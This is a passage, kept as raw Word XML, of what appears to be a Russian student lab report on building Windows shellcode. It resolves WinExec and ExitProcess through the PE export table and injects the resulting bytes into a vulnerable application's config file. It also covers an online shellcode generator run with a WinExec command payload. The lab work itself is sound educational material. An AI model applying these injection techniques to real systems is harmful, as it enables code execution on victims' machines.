          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>адресной таблице</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8D7E76" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E47F75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Итак, чтобы найти </w:t>
      </w:r>
      <w:r w:rsidRPr="0053412B">
        <w:rPr>
          <w:rStyle w:val="afff2"/>
          <w:rFonts w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>WinExec</w:t>
      </w:r>
      <w:r w:rsidRPr="00E47F75">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, мы должны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42393EBF" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00F01647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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> RVA сигнатуры PE (базовый адрес + 0x3C байт</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29290E7A" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E354E8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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес PE-сигнатуры (базовый адрес + RVA PE-сигнатуры)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D1B77" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> RVA таблицы экспорта (адрес PE-сигнатуры + 0x78 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22B3601A" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес таблицы экспорта (базовый адрес + RVA таблицы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>экспорта)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567A7DF1" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E354E8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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> количество экспортируемых функций (адрес таблицы экспорта + 0x14 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343E5EBE" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> RVA адресной таблицы (адрес таблицы экспорта + 0x1C)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57C570D8" w14:textId="77777777" w:rsidR="008E5E75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lastRenderedPageBreak/>
        <w:t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес адресной таблицы (базовый адрес + RVA адресной таблицы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C86F5CB" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> RVA таблицы указателей имен (адрес таблицы экспорта + 0x20 байт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70905917" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес таблицы указателей имен (базовый адрес + RVA таблицы указателей имен)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CB6BA38" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> RVA порядковой таблицы (адрес таблицы экспорта + 0x24 байта)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3912E1B7" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="00E354E8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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес порядковой таблицы (базовый адрес + RVA порядковой таблицы)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A0E90" w14:textId="546A8089" w:rsidR="008E5E75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Перебира</w:t>
      </w:r>
      <w:r w:rsidR="002C571E">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>ем</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> таблицу указателей имен, сравнивая каждую строку (имя) с “WinExec” и сохраняя количество позиций.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BD5F11" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> порядковый номер WinExec из порядковой таблицы (адрес порядковой таблицы + (позиция * 2) байт). Каждая запись в порядковой таблице составляет 2 байта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62F4BDDB" w14:textId="77777777" w:rsidR="008E5E75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t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> функцию RVA из адресной таблицы (адрес адресной таблицы + (порядковый номер * 4) байт). Каждая запись в таблице адресов составляет 4 байта.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62245A9D" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRPr="003A5493" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="a2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="851"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Найти</w:t>
      </w:r>
      <w:r w:rsidRPr="00F01647">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> адрес функции (базовый адрес + RVA функции)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27B533FF" w14:textId="3AB2EDD0" w:rsidR="008E5E75" w:rsidRPr="00296A4E" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:r>
        <w:t>В Приложении 1 представлен шелл-код полностью.</w:t>
      </w:r>
      <w:r w:rsidRPr="00296A4E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Скомпилируем код с использованием </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>fasm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Теперь декомпилируем исполняемый файл командой </w:t>
      </w:r>
      <w:r w:rsidRPr="00296A4E">
        <w:t>objdump -d -M intel shell.exe</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. На Рисунке </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> представлен результат декомпиляции. Таким образом, удалось превратить ассемблерные команды в байты, которые будут вставлены в конфиг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9873E2" w14:textId="77777777" w:rsidR="008E5E75" w:rsidRDefault="008E5E75" w:rsidP="008E5E75">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00296A4E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="53D813AC" wp14:editId="2377908B">
            <wp:extent cx="4399280" cy="6240818"/>
            <wp:effectExtent l="0" t="0" r="1270" b="762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8223" cy="62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4E6F" w14:textId="484A9728" w:rsidR="005A5E62" w:rsidRDefault="008E5E75" w:rsidP="00887A95">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="00A10EA5">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ― Получение шелл-кода в виде символов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67248920" w14:textId="739401EF" w:rsidR="005A5E62" w:rsidRDefault="00723821" w:rsidP="005A5E62">
      <w:r>
        <w:t xml:space="preserve">Чтобы процесс завершался корректно и незаметно для «жертвы», проделаем те же махинации с функцией </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="00723821">
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Таким образом, сразу после вызова команды в консоли, программа будет завершаться.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07B0EF2B" w14:textId="77777777" w:rsidR="00887A95" w:rsidRDefault="00A10EA5" w:rsidP="00A10EA5">
      <w:r>
        <w:t xml:space="preserve">На </w:t>
      </w:r>
      <w:r w:rsidR="00350995">
        <w:t xml:space="preserve">Рисунке 8 представлен </w:t>
      </w:r>
      <w:r w:rsidR="00887A95">
        <w:t>результат тестирования программы</w:t>
      </w:r>
      <w:r w:rsidR="00350995">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DA9C50" w14:textId="5A24EB31" w:rsidR="00887A95" w:rsidRDefault="00887A95" w:rsidP="00887A95">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00887A95">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="135B3657" wp14:editId="2D00E551">
            <wp:extent cx="5940425" cy="4222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BD4D" w14:textId="66B0115B" w:rsidR="00A10EA5" w:rsidRDefault="00887A95" w:rsidP="00887A95">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок 8 </w:t>
      </w:r>
      <w:r w:rsidR="00ED5472">
        <w:t>— Демонстрация работы программы</w:t>
      </w:r>
      <w:r w:rsidR="00350995">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B96C6E7" w14:textId="7E1B0184" w:rsidR="003056F6" w:rsidRDefault="003056F6" w:rsidP="003056F6">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Доп задание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D16162B" w14:textId="506109C0" w:rsidR="003056F6" w:rsidRDefault="003056F6" w:rsidP="003056F6">
      <w:r>
        <w:t>В качестве дополнительного задания было необходимо реализовать эксплойт на языке Си. Для этого был использован генератор эксплойтов, найденный на просторах интернета. Данный генератор работает следующим образом</w:t>
      </w:r>
      <w:r w:rsidR="006567B5">
        <w:t>. В файле .</w:t>
      </w:r>
      <w:r w:rsidR="006567B5">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>txt</w:t>
      </w:r>
      <w:r w:rsidR="006567B5" w:rsidRPr="006567B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006567B5">
        <w:t>необходимо написать код примерно следующего формата:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1714B8" w14:textId="77777777" w:rsidR="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>function WinExec("kernel32.dll");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1682A1C6" w14:textId="77777777" w:rsidR="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>function ExitProcess("kernel32.dll");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C84F4FC" w14:textId="77777777" w:rsidR="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
      </w:pPr>
      <w:r>
        <w:t>WinExec("cmd /c ipconfig /all &gt; c:\Users\heath\Desktop\net.txt",0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B52D7AF" w14:textId="24AE0EAB" w:rsidR="006567B5" w:rsidRPr="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>ExitProcess</w:t>
      </w:r>
      <w:r w:rsidRPr="006567B5">
        <w:rPr>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535384F0" w14:textId="615AC679" w:rsidR="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:r>
        <w:t>При этом стоит помнить о нескольких ограничениях:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03184E8C" w14:textId="53D8CA0E" w:rsidR="006567B5" w:rsidRPr="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006567B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Невозможно использовать возвращаемое значение вызова API</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568A065B" w14:textId="3ECC6D5A" w:rsidR="006567B5" w:rsidRPr="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006567B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Невозможно использовать указатели или буферы</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0822C56E" w14:textId="01092E56" w:rsidR="006567B5" w:rsidRPr="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:pPr>
        <w:pStyle w:val="20"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006567B5">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Невозможно объявлять переменные</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="727D0A03" w14:textId="61895501" w:rsidR="006567B5" w:rsidRDefault="006567B5" w:rsidP="006567B5">
      <w:r>
        <w:t>После этого данный код можно скомпилировать и записать в файл формата .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin</w:t>
      </w:r>
      <w:r w:rsidRPr="006567B5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>или .</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>asm</w:t>
      </w:r>
      <w:r>
        <w:t>, можно сразу протестировать работоспособность</w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:t xml:space="preserve">, при </w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:lastRenderedPageBreak/>
        <w:t>всём этом важно указывать платформу компиляции.</w:t>
      </w:r>
      <w:r w:rsidR="00862A8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:t xml:space="preserve">Данный генератор работает как для ос семейства </w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="002F76A4" w:rsidRPr="002F76A4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:t xml:space="preserve">так и </w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidR="002F76A4">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00862A8F">
        <w:t xml:space="preserve"> После генерации бинарного файла его содержимое вручную переносится в конфиг.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EE087" w14:textId="376D6093" w:rsidR="00862A8F" w:rsidRDefault="00862A8F" w:rsidP="006567B5">
      <w:r>
        <w:t xml:space="preserve">При тестировании из консоли шелл-код работал, а при запуске уязвимого приложения почему-то нет. Оказалось, что нужно изменить байты перед ним. Там было написано </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidRPr="00862A8F">
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что означает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>jmp</w:t>
      </w:r>
      <w:r w:rsidRPr="00862A8F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">на 11 байт вперед, но прыжок нужно совершить лишь на 10 байт. После замены на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EB</w:t>
      </w:r>
      <w:r w:rsidRPr="00862A8F">
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> всё стало работать корректно</w:t>
      </w:r>
      <w:r w:rsidR="00486388">
        <w:t xml:space="preserve"> (Рисунок 9)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23A88BAA" w14:textId="77B94B28" w:rsidR="00486388" w:rsidRDefault="00486388" w:rsidP="00486388">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00486388">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4DCD44BC" wp14:editId="7D065A0B">
            <wp:extent cx="5940425" cy="210058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44C8" w14:textId="3F51AB44" w:rsidR="00486388" w:rsidRDefault="00486388" w:rsidP="00486388">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 9 — Демонстрация работы нового шелл-кода</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B242C48" w14:textId="6CBF9611" w:rsidR="00707D9E" w:rsidRDefault="00707D9E" w:rsidP="00707D9E">
      <w:r>
        <w:t>Рассмотрим подробнее работу генератора шелл-кода. В Таблице 1 представлен список его файлов и описание выполняемых действий.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CECF8B3" w14:textId="28317F26" w:rsidR="00707D9E" w:rsidRDefault="00707D9E" w:rsidP="00707D9E">
      <w:pPr>
        <w:pStyle w:val="ab"/>
      </w:pPr>
      <w:r>
        <w:t>Таблица 1 — Список файлов генератора шелл-кода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07D9E" w14:paraId="5BB5747F" w14:textId="77777777" w:rsidTr="00916747">
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2007547D" w14:textId="44946194" w:rsidR="00707D9E" w:rsidRDefault="00707D9E" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Файл</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4786" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5440F9A1" w14:textId="0AFED0AF" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Действие</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="757FA63B" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5B431243" w14:textId="067BA891" w:rsidR="00707D9E" w:rsidRPr="00553EBA" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:t>ASMHeader.cpp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37208449" w14:textId="4BF1FFE1" w:rsidR="00707D9E" w:rsidRPr="00AB024A" w:rsidRDefault="00AB024A" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Функции возвращают асм заголовки для х64 и х86 соответственно. В этих заголовках происходит поиск таблицы экспортов по структуре </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>PEB</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">, загружается </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>kernel</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB024A">
              <w:t>32.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>dll</w:t>
            </w:r>
            <w:r>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidR="004801DD">
              <w:t xml:space="preserve"> ищется необходимая функция</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="7E3AF21A" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D190ABD" w14:textId="71DA8C2F" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:t>CallFunctionsStates.cpp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04BDBE52" w14:textId="3210DCC3" w:rsidR="00707D9E" w:rsidRPr="00B04990" w:rsidRDefault="00B04990" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Парсинг строки с целью достать аргументы функции</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="55AC8D5D" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3666D6FE" w14:textId="6840D1C5" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:t>CommandLine.cpp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22529861" w14:textId="77EF4AAE" w:rsidR="00707D9E" w:rsidRDefault="000C383E" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Работа с командной строкой: печать </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>сообщения-помощника и парсинг полученных аргументов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="41A28DE2" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57B8179A" w14:textId="19BC6596" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:lastRenderedPageBreak/>
              <w:t>Compile.cpp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4C6E6196" w14:textId="3F57B6DE" w:rsidR="00707D9E" w:rsidRDefault="00246908" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Парсинг файла с кодом, распознавание функций и их аргументов. Сборка всего вместе: платформа, вызовы функций, заголовок асм</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00707D9E" w14:paraId="4D3D10EF" w14:textId="77777777" w:rsidTr="00707D9E">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4785" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="142A0181" w14:textId="6B91D7FF" w:rsidR="00707D9E" w:rsidRDefault="00302D43" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r w:rsidRPr="00302D43">
              <w:t>DebugUtils.cpp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2A8862A5" w14:textId="2AA42353" w:rsidR="00707D9E" w:rsidRDefault="00B20F74" w:rsidP="00707D9E">
            <w:pPr>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:t>Получение дампа и тестирование полученного шелл-кода</w:t>
            </w:r>
          </w:p>
